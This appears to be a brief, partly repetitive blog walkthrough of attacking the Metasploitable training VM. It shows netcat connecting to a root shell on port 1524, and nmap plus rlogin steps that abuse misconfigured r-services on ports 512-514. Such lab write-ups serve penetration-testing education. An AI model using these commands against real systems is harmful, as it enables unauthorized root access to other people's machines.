Metasploitable Root shell 1524/tcp open shell Metasploitable root shell This was a curiousity… My first attempt was to attempt using rlogin to connect to the port, which did not appear to work correctly, though did seem to work enough to return part of a prompt to the user: root@kali:~# rlogin -p 1524 target oot@metasploitable:/# My next approach was to attempt a simple netcat connection to the host, which ended up being successful: root@kali:~# nc -v target 1524 root@metasploitable:/# id ...
Exploit and connect to port 512 ,513, and 514
༄ Unix Basics
🔂 Step-1:
First type "nmap -v <victim ip>"
🔄 Step-2:
type "rlogin -l <user account> <ip address of victim>
by Er. SANJAY KUMAR
sanjayyadav11210@gmail.com
༄ Unix Basics
TCP ports 512, 513, and 514 are known as "r" services, and have been misconfigured
to allow remote access from any host (a standard ".rhosts + +" situation).
To take advantage of this, make sure the "rsh-client" client is installed (on Ubuntu), and
run the following command as your local root user. If you are prompted for an SSH key,
this means the rsh-client tools have not been installed and Ubuntu is defaulting to
using SSH.
🔂 Step-1:
First type "nmap -v <victim ip>"
🔄 Step-2:
type "rlogin -l <user account> <ip address of victim>
by Er. SANJAY KUMAR
sanjayyadav11210@gmail.com
Comments
Post a Comment